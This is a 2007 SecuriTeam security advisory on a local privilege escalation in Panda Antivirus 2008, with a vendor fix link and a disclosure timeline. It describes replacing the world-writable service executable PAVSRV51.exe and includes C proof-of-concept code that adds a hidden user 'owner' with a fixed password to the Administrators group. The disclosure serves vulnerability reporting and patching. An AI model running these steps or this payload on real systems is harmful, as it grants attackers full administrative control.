The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Panda Antivirus 2008 Local Privilege Escalation
------------------------------------------------------------------------
SUMMARY
A vulnerability in the way Panda Antivirus handles permissions of local
files allows local attackers to escalate their privileges by replacing
files used by the Panda Antivirus software.
DETAILS
Vulnerable Systems:
* Panda Antivirus 2008
During installation of Panda Antivirus 2008 the permissions for
installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008\ by
default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE)
are started from this folder. Services are started under LocalSystem
account. There is no protection of service files. It's possible for
unprivileged user to replace service executable with the file of his
choice to get full access with LocalSystem privileges. Or to get
privileges or any user (including system administrator) who logons to
vulnerable host. This can be exploited by:
a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
b. Copy any application to PAVSRV51.exe
c. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
Proof of concept:
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123
/add", szWinDir );
system( szCmdLine );
printf( "Adding user \"owner\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators
owner /add", szWinDir );
system( szCmdLine );
return 0;
}
Vendor response:
"A fix available here:
<http://www.pandasecurity.com/homeusers/support/card?id=41111&idIdioma=2&ref=PAV08Dev>
http://www.pandasecurity.com/homeusers/support/card?id=41111&idIdioma=2&ref=PAV08Dev
Users of vulnerable 2007 versions should upgrade to Panda Antivirus 2008
and apply the fix provided.
For future vulnerability reporting to Panda please write specifically and
exclusively to "Panda Security Response" <secure@pandasecurity.com>
instead of generic beta or informational contact mailboxes."
Disclosure Timeline:
2007.06.07 - Vulnerability found
2007.06.07 - Reported to Vendor (Until Beta)
2007.07.31 - Released by vender
2007.08.02 - Public Disclosure
ADDITIONAL INFORMATION
The information has been provided by <mailto:tarkus@tiifp.org> tarkus.
The original article can be found at:
<https://tiifp.org/tarkus/advisories/panda030707.txt>
https://tiifp.org/tarkus/advisories/panda030707.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
